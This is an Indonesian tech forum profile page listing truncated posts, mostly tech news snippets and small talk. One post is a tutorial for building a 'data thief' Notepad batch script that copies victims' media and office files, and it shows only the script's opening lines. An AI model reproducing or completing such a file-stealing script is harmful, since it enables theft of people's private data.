Jump to content

peter_hutomo

Premium Account
  • Content Count

    121
  • Joined

  • Last visited

  • Days Won

    5

Everything posted by peter_hutomo

  1. Para teknisi di Rusia menciptakan helm yang dilengkapi teknologi suara agar bisa memberi tahu para pengendara motor soal informasi GPS. Helm GPS yang diberi nama LiveMap mampu memberikan layanan berupa suara untuk menavigasikan arah dan menampilkannya di kaca helm yang transparan. Helm pintar yang berbasis sistem Android dengan bobot ringan ini dilengkapi dengan fitur suara dan kompas digital untuk mengarahkan para pengendara motor, karena kecil kemungkinan mereka mampu memanfaatkan fitur peta di dalam ponsel selagi mengemudi. Di bagian tengah helm ditanamkan layar berukuran mungil
  2. Kehadiran ponsel pintar, tablet, komputer, hingga konsol game yang kian populer mengubah kebiasaan anak usia lima hingga 16 tahun. Lembaga riset Childwise yang berbasis di Inggris melakukan riset dan mengungkapkan bahwa anak masa kini rata-rata menghabiskan waktu 6,5 jam per hari untuk beraktivitas dengan gadget-nya. Sesuai laporan dari Childwise, apa yang dilakukan anak-anak 20 tahun lalu atau sekitar tahun 1995 tentu berbeda dengan anak zaman sekarang. Dulu, mereka hanya menghabiskan waktu rata-rata tiga jam per hari di depan perangkat berlayar, itupun hanya sebatas layar televisi. K
  3. USB sudah menjadi interface yang umum bagi mereka yang terbiasa berkutat dengan perangkat digital seperti PC desktop, laptop, smartphone, dan tablet. Baru-baru ini muncul standar baru dari USB yang disebut USB Type-C dan digunakan oleh sejumlah perangkat seperti MSI Z97A GAMING 6, Apple MacBook yang baru, dan Google Chromebook Pixel yang baru. Nah, biar kamu lebih familiar dengan USB Type-C ini, simak beberapa pertanyaan seputar USB Type-C berikut ini, tentunya beserta jawabannya. Apakah USB Type-C itu? USB Type-C adalah standar baru yang dibuat oleh USB Implementers Forum (badan yang
  4. Duet Galaxy S6 adalah ponsel pintar terbaru besutan Samsung. Diumumkan di Bulan Maret, Galaxy S6 dan Galaxy S6 Edge sudah mulai melalang buana untuk dipamerkan di beberapa negara. Termasuk saat membuat acara peluncuran Galaxy S6 dan Galaxy S6 Edge di Tiongkok. Namun, bukan dua handset ini yang menarik perhatian. Tapi ada gosip tak enak yang menyertai acara peluncurannya. Walau sulit dipercaya, ada kabar angin dihembuskan bahwa Samsung mendatangkan penonton bayaran di acara yang berlangsung di Negeri Tirai Bambu tersebut. Tak tanggung-tanggung, 500 'tamu' ini menghampiri hajatan Samsung
  5. Google rencananya akan menggunakan algoritma baru untuk mesin pencari mereka, dengan sistem ini pencarian akan sedikit berbeda. Metode pencarian nanti dioptimalkan untuk situs-situs yang bersahabat dengan ponsel. Tak peduli apakah pengguna sedang melakukan pencarian di komputer atau tablet, situs yang optimal untuk ponsel akan diprioritaskan. Google tak menyebutkan secara rinci situs seperti apa yang dianggap mereka bersahabat untuk ponsel, namun mesin pencari itu menyediakan satu halaman khusus untuk menguji apakah situs pengguna memang cocok untuk ponsel. Algoritma baru tersebut
  6. Nampaknya para petugas di sektor pemerintahan harus menjadi sosok yang benar-benar melek teknologi. Terlebih jika bekerja di lembaga pemasyarakatan. Kalau tidak, kasus pelarian narapidana seperti yang baru-baru ini terjadi di Inggris bisa terulang di tanah air. Langkah pelarian yang dilakukan oleh narapidana bernama Neil Moore memang cukup menarik. Dia tak perlu melakukan berbagai aksi berbahaya ataupun menggali lubang dalam yang butuh waktu panjang. Dalam aksi pelariannya itu, Moore hanya membutuhkan sebuah ponsel yang dipakainya untuk membuat akun email palsu. Moore pun menulis email
  7. Makin banyak perangkat, khususnya HDTV dan monitor komputer, yang menyandang embel-embel 4K. Sementara itu ada juga istilah UHD atau Ultra HD. Kedua istilah ini, 4K dan UHD sering dianggap sama. Produsen TV, broadcaster, dan blog teknologi menggunakannya bergantian dalam satu nafas. Sebenarnya 4K dan UHD sama tidak sih? Hmm, 4K dan UHD awalnya tidaklah sama. Secara teknik juga tidak sama sampai hari ini. Dari sisi penonton, memang perbedaannya tidak besar. Kalau mau jawaban singkat, 4K masih hidup, sedangkan UHD tidak. 4K vs. UHD Cara paling gampang membedakan 4K dan UHD adalah ini
  8. Akuisisi terhadap WhatsApp menjadi salah satu proses akuisisi terbesar yang dilakukan oleh Facebook. Pada saat proses awal akuisisi tersebut, kedua pihak pun mengungkapkan kalau aplikasi Facebook dan WhatsApp tetap akan berjalan secara independen. Namun pernyataan tersebut nampaknya tak berlaku lama. Facebook saat ini tengah berusaha untuk melakukan proses integrasi WhatsApp kepada aplikasi Facebook miliknya. Sebagai langkah awal, proses integrasi ini dilakukan pada aplikasi Facebook Android. Bahkan Geektime pun menyebut kalau Facebook Android versi 31.0.0.7.13 yang belum secara resmi dilu
  9. udah lama gak disini. :D

  10. Cara Membuat Program Pencuri Data Dengan Notepad program ini berfungsi untuk mencuri data seperti: *.3gp *.jpg *.avi *.wmv *.rm *.mpg *.doc *.xlsx Dan lainnya sudah tersedia dalam script berikut, caranya mudah banget : 1. Buka Notepad kalian melalui accessories atau melalui Run ketikan notepad. 2. Setelah kebuka notepadnya copy paste script berikut : Sciptnya adalah echo off color 0a mode 31,15 if "%1"=="/?" goto Sej if not "%n%" == "" set n= :MetDtg cls title Stole V 3.2 msg * Digunakan untuk mencuri msg * File atau data2 korban echo. echo ÚÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÃ
  11. Jepang memamng negerinya ilmuwan dan teknologi.

  12. selamat beraktifitas pagi

  13. udah ada ITnya disini,.

  14. program kantor belumm selesai ada tugas lagi, weekend kerja. ---____---

  15. kekesalan semakin bertambah ketika tugas pekerjaan bertambah

  16. Dengan teknologi terbaru, komputer dapat memahami para pengguna dengan membaca pikiran mereka. Apa yang terdengar seperti fiksi ilmiah ini sudah lolos ujicoba pertama - dalam sebuah simulator terbang. Pilot yang duduk dalam simulator terbang dan menggunakan topi EEG (sebuah topi yang dilengkapi elektroda yang membaca aktivitas otak) sudah berhasil menerbangkan pesawat tanpa menggunakan tangan - hanya dengan membayangkan joystick dalam pikiran. Ini tentu memicu reaksi media terkait 'pengontrolan pikiran gaya fiksi ilmiah,' namun aplikasi teknologi ini masih berdekade lamanya - dan itupu
  17. weekend sama istri dan anak setelah pulang lebaran kemarin

    1. RendyGunawan

      RendyGunawan

      kayanya enak nih ndral jalan2 terus hehehe

  18. Bisa buat belajar orang orang / pun para pelajar
  19. Handset-handset yang dibuat oleh manufaktur Xiaomi selalu menarik perhatian karena mereka menyediakan perangkat yang terjangkau namun dengan spesifikasi dan performa yang memadai. Kini terkuak sebuah fakta, dimana handset RedMi Note ketahuan mengirim data-data pribadi pengguna ke server negeri asalnya, Tiongkok. Foto-foto pengguna dan juga pesan teks pengguna ditransfer ke server pribadi yang berada di Tiongkok. Handset akan terhubung ke suatu alamat IP secara otomatis ketika masuk ke jaringan WiFi dan langsung mengirim data. Bahkan handset juga akan mengirim data melalui jaringan 3G namu
  20. Banyak bahaya di Dunia tentang dunia IT, apasaja? Ikutin topic ane ndral.

  21. Lebaran akan datang besok ndral

  22. Membuat sebuah website memang terlihat mudah untuk sebuah web programming dan web desainer. Namun ada kalanya membuat website terlihat sulit dan cukup rumit ketika kita tidak tahu apa yang dibutuhkan untuk bisa membuat website yang menarik dan informatif. Kita bisa saja meminta bantuan para ahli untuk membantu kita membuat website yang kita inginkan, tapi masih ada ternyata yang kita butuhkan untuk memenuhi syarat sebuah website bisa menarik bagi pengunjuk internet. Nah, berikut ini adalah 5 hal yang harus diperhatikan sebelum kita membuat sebuah website: 1. Nama domain 2. Logo we
  23. Perkembangan teknologi saat ini membuat setiap orang ingin selalu terlibat di dalam perkembangan informasi baik secara online maupun offline. Ini juga didukung adanya suatu media yang memudahkan siapa saja untuk membagikan informasi dan ilmu kepada masyarakat. Salah satu yang disukai dan mudah untuk digunakan adalah sebuah blog baik pribadi maupun yang masih berkaitan dengan bisnis yang sedang dijalani. Namun membuat sebuah blog beserta postingan di dalamnya tidak melulu mudah untuk dilakukan. Karena bagaimanapun penyampaian informasi dan ilmu melalui blog jelas berbeda dengan penyampaian seca
  24. Sebuah website akan sangat penting ketika menjadi nyawa dari sebuah pekerjaan atau bisnis. Jika Anda seorang pebisnis Anda tentu akan sedikit banyak memperhatikan fungsi dari website Anda, baik bisnis online ataupun offline yang Anda miliki. Karena website akan menyampaikan informasi bisnis Anda kepada audiens yang belum mengenal siapa Anda. Dan itu sebabnya, sebuah website bisnis profesional tentu harus memiliki kualitas yang baik, termasuk pada kecepatannya. Nah, dibawah ini ada 5 kebutuhan yang harus dipenuhi oleh setiap pemilik website untuk mengoptimasi kecepatan website mereka. 1. Op
  25. Ada yang bilang menulis di blog itu hanya sebatas mengisi waktu luang dan tidak untuk mencari penghasilan. Tapi siapa sangka, sekarang ini justru blog menjadi salah satu ladang penghasilan yang menjanjikan. Banyak blogger yang awalnya hanya menjadikan blog sebagai media menulis biasa menjadikannya sebagai sebuah bisnis online. Ini tentu sangat menguntungkan, karena selain hobi menulis yang tersalurkan, pundi pundi uangpun juga bisa dadapatkan. Namun sebenarnya menjadi blogger itu yang bagaimana sih? Apakah hanya sebatas menulis dan menulis saja? Tentu ada yang harus dilakukan lebih dari seked
×
×
  • Create New...